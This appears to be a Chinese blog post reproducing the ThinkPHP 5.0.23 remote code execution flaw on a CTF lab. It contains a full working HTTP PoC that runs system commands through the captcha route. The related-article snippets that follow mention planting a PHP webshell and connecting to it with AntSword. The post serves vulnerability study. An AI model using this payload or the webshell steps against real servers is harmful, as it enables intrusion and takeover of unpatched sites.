[ThinkPHP]5.0.23-Rce 漏洞复现

最新推荐文章于 2025-02-02 00:15:54 发布
原创 最新推荐文章于 2025-02-02 00:15:54 发布 · 4.2k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了一个存在于 ThinkPHP 5.0.23 版本中的远程代码执行 (RCE) 漏洞,并提供了环境搭建步骤、漏洞利用 PoC 代码及演示过程。

[ThinkPHP]5.0.23-Rce

环境搭建

github传送门
BUU传送门

POC

在这里插入图片描述
老懒狗选择直接buu,链接

http://node3.buuoj.cn:27512/

直接用poc打一下:

POST /index.php?s=captcha HTTP/1.1
Host: node3.buuoj.cn:27512
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

直接在burp的repeater模块里面构造就行了:

最低0.47元/天 解锁文章
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2918
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
thinkphp5.0.23rce复现
Cwillchris的博客
03-13 854
5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。从图中可以看出,docker0网卡发生了错误,并且没有常见的IPV4,这里基本可以确定是docker的网络出现了问题 , 可以通过重置docker网络解决。可以发现docker的网卡正常了,并且通过物理机访问docker容器中的应用也已经正常。这样就掌握了漏洞利用的完整过程。启动环境,启动环境会先拉取镜像,网络不好可能会拉取不下来的。
thinkphp5-rce
shierbai的博客
05-17 631
method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=id(系统命令)此之前的版本中,获取method的方法没有正确处理方法名,攻击者可以调用request类任意方法并构造利用链,从而导致远程代码执行漏洞。其版本5中,没有正确处理控制器名,导致网站在没有开启强制路由的情况下(默认情况)可以执行任意方法,从而导致远程命令执行漏洞。应用:很多cms是基于thinkphp5二次开发的,所以出问题的话,会影响很多基于其开发的网站。
ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE
shelter1234567的博客
01-22 1552
本次我们继续以漏洞挖掘者的视角,来分析thinkphpRCE
Thiinkphp 5.0.23-rce 漏洞复现(vulhub)
MDSEC的博客
08-22 447
形成原因是因为其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。这样thinkphp 5.0.23-rce漏洞复现完成了。2>.bp抓包修改post请求,传递参数。响应包状态码为500,但是可以访问页面。访问8080端口的本机地址。尝试写入phpinfo。
Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-23 2035
这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。然后我们在浏览器输入就可以访问靶场环境。
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2831
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
漏洞复现Thinkphp5.0.23-rce
2401_86120759的博客
10-21 795
实现框架的核心类Requests的method方法实现表单请求类伪装,默认为$_POST[‘_method’]变量,却没有对_method属性进行严格校验,可以通过变量覆盖Requests类的属性,在结合框架特性实现对任意函数的调用实现任意代码执行。查看后台输入语句:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd。网站后拼接index.php/?s=captcha进行访问。建议进行ThinkPHP版本更新。
【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
m0_75036923的博客
09-07 1008
【代码】【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现
ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
qq_45079558的博客
09-08 545
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。
buuctf [ThinkPHP]5.0.23-Rce
qq_1873822的博客
03-14 1379
poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.
ThinkPHP5代码审计【RCE
D.MIND 的博客
05-14 1465
composer create-project --prefer-dist topthink/think=5.0.23 thinkphp_5.0.23
Thinkphp5.0.2Rce分析
lastwinn的博客
07-06 2528
记录自己的所学以及理解。
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-17 3946
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
0学代码审计 | thinkphp 5.0.23 RCE
2301_80127209的博客
12-18 1358
ThinkPHP 是一款开源的 PHP 框架,用于快速、简单地开发 PHP 应用程序。它提供了一套丰富的功能和工具,使开发者能够更容易地构建各种规模的 Web 应用。ThinkPHP 的目标是提高开发效率,同时保持代码的可读性和可维护性。thinkphp的许多版本中也爆出了多个漏洞,本篇文章主要记录thinkphp 5.0.23版本 RCE漏洞复现
ThinkPHP任意代码执行(4-rce
2301_82197189的博客
05-31 318
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 1588
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞
ThinkPHP6.0.12反序列化RCE挖掘
include_voidmain的博客
07-05 2120
ThinkPHP6.0.12反序列化RCE挖掘
攻防世界_php_rceThinkPHP框架)
最新发布
2401_87524087的博客
02-02 1171
常见攻击方式 Web应用漏洞利用:如PHP应用中,若对用户输入过滤不严格,攻击者可通过表单、URL参数等注入恶意命令,借助服务器执行命令的函数,像 system() 、 exec() 等实现远程命令执行。RCE指攻击者能通过网络远程控制目标系统,执行恶意命令,获取敏感信息、控制设备、传播恶意软件等,对系统安全和数据造成极大威胁。RCE(Remote Command Execution)远程命令执行,是一种严重的网络安全漏洞。点链接,发现是广告,没什么特别的,再看题目php.rce,查一下RCE是什么。
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值